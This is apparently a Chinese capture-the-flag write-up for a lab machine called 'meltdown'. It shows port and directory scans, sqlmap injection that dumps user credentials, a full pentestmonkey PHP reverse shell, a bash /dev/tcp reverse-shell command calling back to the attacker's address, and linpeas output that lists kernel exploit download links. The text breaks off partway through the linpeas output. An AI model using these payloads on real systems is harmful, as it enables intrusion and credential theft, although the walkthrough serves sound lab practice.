|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: \xE7\x82\x89\xE5\xBF\x83\xE8\x9E\x8D\xE8\xA7\xA3
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.86 seconds

目录扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# dirsearch -u http://192.168.0.102     

  _|. _ _  _  _  _ _|_    v0.4.3.post1                                                                      
 (_||| _) (/_(_|| (_| )                                                                                     
                                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.0.102/_26-01-13_03-13-20.txt

Target: http://192.168.0.102/

[03:13:20] Starting:                                                                                        
[03:13:22] 403 -  278B  - /.ht_wsr.txt                                      
[03:13:22] 403 -  278B  - /.htaccess.bak1                                   
[03:13:22] 403 -  278B  - /.htaccess.save                                   
[03:13:22] 403 -  278B  - /.htaccess.orig
[03:13:22] 403 -  278B  - /.htaccess_orig                                   
[03:13:22] 403 -  278B  - /.htaccess_extra
[03:13:22] 403 -  278B  - /.htaccess.sample
[03:13:22] 403 -  278B  - /.htaccessBAK
[03:13:22] 403 -  278B  - /.htaccessOLD
[03:13:22] 403 -  278B  - /.htaccessOLD2
[03:13:22] 403 -  278B  - /.htaccess_sc                                     
[03:13:22] 403 -  278B  - /.html                                            
[03:13:22] 403 -  278B  - /.htm
[03:13:22] 403 -  278B  - /.htpasswd_test                                   
[03:13:22] 403 -  278B  - /.htpasswds                                       
[03:13:22] 403 -  278B  - /.httr-oauth
[03:13:23] 403 -  278B  - /.php                                             
[03:13:41] 200 -    1B  - /config.php                                       
[03:13:54] 200 -    2KB - /login.php                                        
[03:13:55] 302 -    0B  - /logout.php  ->  index.php                        
[03:14:08] 403 -  278B  - /server-status/                                   
[03:14:08] 403 -  278B  - /server-status                                    
                                                                             
Task Completed

┌──(web)─(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.0.102 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.102
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,js,yaml,php,txt,html,zip,db
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 7488]
/index.php            (Status: 200) [Size: 4847]
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/item.php             (Status: 200) [Size: 477]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/config.php           (Status: 200) [Size: 1]
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 1985031 / 1985040 (100.00%)
===============================================================
Finished
===============================================================

/index

<body>
    <div class="container">
        <header>
            <h1>🎵 炉心融解 🎵</h1>
            <p>VOCALOID</p>
        </header>
        
                    <div class="login-prompt">
                <p>🎯 <a href="login.php">请先登录以访问更多功能</a></p>
            </div>
                
        <section class="items-section">
            <h2>🔮 物品列表</h2>
            <ul class="items-list">
                <li><a href="item.php?id=1">炉心</a></li>            </ul>
        </section>
        
        <section class="characters-section">
            <h2>🌟 术曲人物介绍</h2>
            <div class="characters">
                <div class="character-card"><h3>初音ミク</h3><p>初音未来是Crypton Future Media以Yamaha的VOCALOID系列语音合成程序为基础开发的音源库，是术曲文化的重要代表人物。</p></div><div class="character-card"><h3>鏡音リン</h3><p>镜音铃是CRYPTON FUTURE MEDIA以Yamaha的VOCALOID 2语音合成引擎为基础开发的虚拟歌手，是术曲《炉心融解》的原唱。</p></div><div class="character-card"><h3>鏡音レン</h3><p>镜音连是镜音铃的搭档，同样是VOCALOID虚拟歌手，在众多术曲中与镜音铃合作演唱。</p></div><div class="character-card"><h3>巡音ルカ</h3><p>巡音流歌是CRYPTON FUTURE MEDIA以Yamaha的VOCALOID 2语音合成引擎为基础开发的虚拟女性歌手软件角色，音色成熟华丽。</p></div><div class="character-card"><h3>KAITO</h3><p>KAITO是CRYPTON FUTURE MEDIA发售的VOCALOID系列语音合成软件的虚拟歌手，是VOCALOID家族中的大哥角色。</p></div><div class="character-card"><h3>MEIKO</h3><p>MEIKO是CRYPTON FUTURE MEDIA发售的VOCALOID系列语音合成软件的虚拟歌手，是VOCALOID家族中的大姐角色。</p></div>            </div>
        </section>
    </div>
</body>

/item.php?id=1

尝试sql注入

sql注入

┌──(web)─(root㉿kali)-[/home/kali]
└─# sqlmap -u http://192.168.0.102/item.php?id=1 --batch
        ___
       __H__                                                                                                
 ___ ___["]_____ ___ ___  {1.8.11#stable}                                                                   
|_ -| . [)]     | .'| . |                                                                                   
|___|_  ["]_|_|_|__,|  _|                                                                                   
      |_|V...       |_|   https://sqlmap.org                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:23:21 /2026-01-13/

[03:23:22] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=8ts85dvcp4g...20emrr2hlq'). Do you want to use those [Y/n] Y
[03:23:22] [INFO] testing if the target URL content is stable
[03:23:22] [INFO] target URL content is stable
[03:23:22] [INFO] testing if GET parameter 'id' is dynamic
[03:23:22] [INFO] GET parameter 'id' appears to be dynamic
[03:23:22] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')                                                                                                     
[03:23:22] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[03:23:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:23:22] [WARNING] reflective value(s) found and filtering out
[03:23:22] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="炉心")
[03:23:22] [INFO] testing 'Generic inline queries'
[03:23:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                                                                                 
[03:23:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[03:23:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[03:23:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[03:23:22] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'                                                                                                     
[03:23:22] [INFO] GET parameter 'id' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable                                                                            
[03:23:22] [INFO] testing 'MySQL inline queries'
[03:23:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[03:23:22] [WARNING] time-based comparison requires larger statistical model, please wait............... (done)
[03:23:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[03:23:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[03:23:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[03:23:22] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[03:23:22] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[03:23:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[03:23:32] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[03:23:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:23:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:23:32] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[03:23:32] [INFO] target URL appears to have 3 columns in query
[03:23:32] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 3043=3043

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1 AND GTID_SUBSET(CONCAT(0x71766a7671,(SELECT (ELT(3331=3331,1))),0x717a627171),3331)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 7672 FROM (SELECT(SLEEP(5)))Zqrt)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-2775 UNION ALL SELECT NULL,CONCAT(0x71766a7671,0x6c42515241676a4e6c475851465077425276494644747a41654561676a4865465970566776727651,0x717a627171),NULL-- -
---
[03:23:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: PHP, Apache 2.4.62
back-end DBMS: MySQL >= 5.6
[03:23:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.102'
[03:23:32] [WARNING] your sqlmap version is outdated

[*] ending @ 03:23:32 /2026-01-13/

发现注入点

sqlmap -u http://192.168.0.102/item.php?id=1 --dbs --batch 

available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] target

sqlmap -u "http://192.168.0.102/item.php?id=1" \
  -D target --tables --batch

Database: target
[3 tables]
+------------+
| characters |
| items      |
| users      |
+------------+

[03:27:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.102'
[03:27:10] [WARNING] your sqlmap version is outdated

[*] ending @ 03:27:10 /2026-01-13

┌──(web)─(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.0.102/item.php?id=1" \
  -D target -T users -C id,password,username --dump --batch
        ___
       __H__                                                                                                
 ___ ___["]_____ ___ ___  {1.8.11#stable}                                                                   
|_ -| . [.]     | .'| . |                                                                                   
|___|_  [,]_|_|_|__,|  _|                                                                                   
      |_|V...       |_|   https://sqlmap.org                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[03:28:17] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'target'
Database: target
Table: users
[1 entry]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | rin123   | rin      |
+----+----------+----------+

[03:28:17] [INFO] table 'target.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.0.102/dump/target/users.csv'                                                                                        
[03:28:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.102'
[03:28:17] [WARNING] your sqlmap version is outdated

[*] ending @ 03:28:17 /2026-01-13/

rin_profile.php

可以添加物品和介绍，尝试反弹shell

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.0.106';
$port = 8888;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

发现报错了

Parse error: syntax error, unexpected token "<", expecting end of file in /var/www/html/item.php(15) : eval()'d code on line 1

更改内容

eval('exec("/bin/bash -c \'bash -i >& /dev/tcp/192.168.0.106/8888 0>&1\'");');

┌──(web)─(root㉿kali)-[/home/kali]
└─# pwncat-cs -lp 8888
/root/.pyenv/versions/3.11.9/envs/web/lib/python3.11/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import iter_entry_points
[03:38:48] Welcome to pwncat 🐈!                                                             __main__.py:164
[03:39:30] received connection from 192.168.0.102:48514                                           bind.py:84
[03:39:30] 192.168.0.102:48514: registered new host w/ db                                     manager.py:957
(local) pwncat$ back
(remote) www-data@meltdown:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@meltdown:/var/www/html$

提权

提权-rin

(remote) www-data@meltdown:/etc/cron.d$ cat php
# /etc/cron.d/php@PHP_VERSION@: crontab fragment for PHP
#  This purges session files in session.save_path older than X,
#  where X is defined in seconds as the largest value of
#  session.gc_maxlifetime from all your SAPI php.ini files
#  or 24 minutes if not defined.  The script triggers only
#  when session.save_handler=files.
#
#  WARNING: The scripts tries hard to honour all relevant
#  session PHP options, but if you do something unusual
#  you have to disable this script and take care of your
#  sessions yourself.

# Look for and purge old sessions every 30 minutes
09,39 *     * * *     root   [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi

(remote) www-data@meltdown:/etc/cron.d$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

(remote) www-data@meltdown:/etc/cron.d$ ss -tulnp
Netid      State       Recv-Q      Send-Q             Local Address:Port             Peer Address:Port      
udp        UNCONN      0           0                        0.0.0.0:68                    0.0.0.0:*         
tcp        LISTEN      0           80                     127.0.0.1:3306                  0.0.0.0:*         
tcp        LISTEN      0           128                      0.0.0.0:22                    0.0.0.0:*         
tcp        LISTEN      0           128                            *:80                          *:*         
tcp        LISTEN      0           128                         [::]:22 [::]:* 

(remote) www-data@meltdown:/tmp$ env
HISTCONTROL=ignorespace
PWD=/tmp
APACHE_LOG_DIR=/var/log/apache2
LANG=C
INVOCATION_ID=03f1117977704453843954fe25f36bbd
APACHE_PID_FILE=/var/run/apache2/apache2.pid
TERM=xterm-256color
APACHE_RUN_GROUP=www-data
APACHE_LOCK_DIR=/var/lock/apache2
SHLVL=3
APACHE_RUN_DIR=/var/run/apache2
PS1=$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")
JOURNAL_STREAM=9:13571
APACHE_RUN_USER=www-data
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env
OLDPWD=/

(remote) www-data@meltdown:/tmp$ history

(remote) www-data@meltdown:/$ grep -ri password

翻了半天在/opt目录下放到了凭据

rin:b59a85af917afd07

rin@meltdown:~$ sudo -l
Matching Defaults entries for rin on meltdown:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rin may run the following commands on meltdown:
    (root) NOPASSWD: /opt/repeater.sh

在测试靶机上这是个兔子洞因为没办法执行

-rw-r--r--1 root root /opt/repeater.sh

重新下hmv靶机

scp linpeas.sh rin@192.168.0.102:/tmp/

rin@meltdown:/tmp$ ./linpeas.sh

[+] /usr/bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h)     
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)                                             
                                                     

Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE                                                 
                                                     
                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════                        
                              ╚════════════════════╝ 
╔══════════╣ Operative system
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits         
Linux version 4.19.0-27-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.316-1 (2024-06-25)
Distributor ID: Debian
Description:    Debian GNU/Linux 10 (buster)
Release:        10
Codename:       buster

╔══════════╣ Sudo version
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version            
Sudo version 1.9.5p2                                 


╔══════════╣ PATH
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses    
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

╔══════════╣ Date & uptime
Tue 13 Jan 2026 04:24:25 AM EST                      
 04:24:25 up  1:12,  1 user,  load average: 0.08, 0.02, 0.21

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices            
UUID=80e68759-1ca0-45eb-82a7-601b1f78dfe5 /               ext4    errors=remount-ro 0       1
UUID=257f425d-1ea4-4b8e-8dd8-69523f25d249 none            swap    sw              0       0
/dev/sr0        /media/cdrom0   udf,iso9660 user,noauto     0       0

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk                                                 
sda
sda1
sda2
sda5

╔══════════╣ Environment
╚ Any private information inside environment variables?                                                   
USER=rin                                             
SSH_CLIENT=192.168.0.106 49106 22
SHLVL=1
HOME=/home/rin
OLDPWD=/etc/cron.d
SSH_TTY=/dev/pts/1
LOGNAME=rin
_=./linpeas.sh
TERM=xterm-256color
XDG_RUNTIME_DIR=/run/user/1000
LANG=en_US.UTF-8
SHELL=/bin/bash
PWD=/tmp
SSH_CONNECTION=192.168.0.106 49106 192.168.0.102 22

╔══════════╣ Searching Signature verification failed in dmesg                                             
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed                                          
dmesg Not Found                                      
                                                     
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester   
[+] [CVE-2019-13272] PTRACE_TRACEME                  

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
   Exposure: highly probable
   Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
   Comments: Requires an active PolKit agent.

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write                                                   

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded


╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found                                                  
═╣ PaX bins present? .............. PaX Not Found    
═╣ Execshield enabled? ............ Execshield Not Found                                                  
═╣ SELinux enabled? ............... sestatus Not Found                                                    
═╣ Seccomp enabled? ............... disabled         
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (oracle)     

╔══════════╣ Kernel Modules Information
══╣ Kernel modules with weak perms?                  
                                                     
══╣ Kernel modules loadable? 
Modules can be loaded                                



                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════                       
                                   ╚═══════════╝     
╔══════════╣ Container related tools present (if any):                                                    
/usr/sbin/apparmor_parser                            
/usr/bin/nsenter
/usr/bin/unshare
/usr/sbin/chroot
/usr/sbin/capsh
/usr/sbin/setcap
/usr/sbin/getcap

╔══════════╣ Container details
═╣ Is this a container? ........... No               
═╣ Any running containers? ........ No               
                                                     


                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════                       
                                     ╚═══════╝       
Learn and practice cloud hacking techniques in https://training.hacktricks.xyz                            
                                                     
═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM or Az metadata? ............. No
═╣ Azure APP or IDENTITY_ENDPOINT? ...... No
═╣ Azure Automation Account? ............ No
═╣ Aliyun ECS? .......................... No
═╣ Tencent CVM? ......................... No



                ╔════════════════════════════════════════════════╗                                        
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════                        
                ╚════════════════════════════════════════════════╝                                        
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes                    
root           1  0.0  0.4  98848 10176 ?        Ss   03:12   0:00 /sbin/init
root         225  0.0  0.7  48996 14988 ?        Ss   03:12   0:00 /lib/systemd/systemd-journald
root         250  0.0  0.2  22280  5056 ?        Ss   03:12   0:00 /lib/systemd/systemd-udevd
systemd+     275  0.0  0.2  89036  5616 ?        Ssl  03:12   0:00 /lib/systemd/systemd-timesyncd
  └─(Caps) 0x0000000002000000=cap_sys_time
root         321  0.0  0.1   6736  2560 ?        Ss   03:12   0:00 /usr/sbin/cron -f
message+     322  0.0  0.2   7944  4172 ?        Ss   03:12   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root         323  0.0  0.1 222784  3852 ?        Ssl  03:12   0:00 /usr/sbin/rsyslogd -n -iNONE
root         324  0.0  0.3  22540  7360 ?        Ss   03:12   0:00 /lib/systemd/systemd-logind
mysql        340  0.0  9.8 1097084 201824 ?      Ssl  03:12   0:02 /usr/local/mysql/bin/mysqld --defaults-file=/etc/my.cnf
root         350  0.0  0.0   5840  1616 tty1     Ss+  03:12   0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root         363  0.0  0.2   9588  5588 ?        Ss   03:12   0:00 /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
root         397  0.0  1.0 108880 20588 ?        Ssl  03:12   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
rin         1514  0.0  0.2  14508  5860 ?        S    04:16   0:00      _ sshd: rin@pts/1
rin         1515  0.0  0.1   7084  3736 pts/1    Ss   04:16   0:00          _ -bash
rin         1563  0.5  0.1   3420  2632 pts/1    S+   04:24   0:00              _ /bin/sh ./linpeas.sh
rin         4632  0.0  0.0   3420  1028 pts/1    S+   04:24   0:00                  _ /bin/sh ./linpeas.sh
rin         4636  0.0  0.1  11844  3396 pts/1    R+   04:24   0:00                  |   _ ps fauxwww
rin         4635  0.0  0.0   3420  1028 pts/1    S+   04:24   0:00                  _ /bin/sh ./linpeas.sh
root         419  0.0  1.5 253876 32580 ?        Ss   03:12   0:00 /usr/sbin/apache2 -k start
www-data     583  0.0  0.8 254308 16576 ?        S    03:14   0:04  _ /usr/sbin/apache2 -k start
www-data     592  0.0  0.9 254308 18768 ?        S    03:14   0:03  _ /usr/sbin/apache2 -k start
www-data     597  0.0  0.8 254316 17636 ?        S    03:14   0:04  _ /usr/sbin/apache2 -k start
www-data     601  0.0  0.8 254308 17460 ?        S    03:14   0:04  _ /usr/sbin/apache2 -k start
www-data     607  0.0  0.8 254308 17756 ?        S    03:14   0:03  _ /usr/sbin/apache2 -k start
www-data     608  0.0  0.8 254308 17860 ?        S    03:14   0:03  _ /usr/sbin/apache2 -k start
www-data     616  0.0  0.8 254308 17860 ?        S    03:14   0:03  _ /usr/sbin/apache2 -k start
www-data     619  0.0  0.8 254308 17756 ?        S    03:14   0:03  _ /usr/sbin/apache2 -k start
www-data     630  0.0  0.8 254308 17580 ?        S    03:14   0:03  _ /usr/sbin/apache2 -k start
www-data     632  0.0  0.9 254308 18688 ?        S    03:14   0:03  _ /usr/sbin/apache2 -k start
www-data     702  0.0  0.0   2472   392 ?        S    03:39   0:00      _ sh -c /bin/bash -c 'bash -i >& /dev/tcp/192.168.0.106/8888 0>&1'
www-data     703  0.0  0.1   3820  2720 ?        S    03:39   0:00          _ /bin/bash -c bash -i >& /dev/tcp/192.168.0.106/8888 0>&1
www-data     704  0.0  0.1   4084  3216 ?        S    03:39   0:00              _ bash -i
www-data     725  0.0  0.0   2596   764 ?        S    03:39   0:00                  _ /usr/bin/script -qc /usr/bin/bash /dev/null
www-data     726  0.0  0.0   2472   400 pts/0    Ss   03:39   0:00                      _ sh -c /usr/bin/bash
www-data     727  0.0  0.1   4084  3228 pts/0    S+   03:39   0:00                          _ /usr/bin/bash
root         957  0.0  0.3 237332  7952 ?        Ssl  03:46   0:00 /usr/libexec/polkitd --no-debug
rin         1369  0.0  0.4  15924  9140 ?        Ss   04:03   0:00 /lib/systemd/systemd --user
rin         1370  0.0  0.1  99764  2416 ?        S    04:03   0:00  _ (sd-pam)

╔══════════╣ Processes with unusual configurations
                                                     
╔══════════╣ Processes with credentials in memory (root req)                                              
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory                                              
gdm-password Not Found                               
gnome-keyring-daemon Not Found                       
lightdm Not Found                                    
vsftpd Not Found                                     
apache2 process found (dump creds from memory as root)
sshd: process found (dump creds from memory as root)
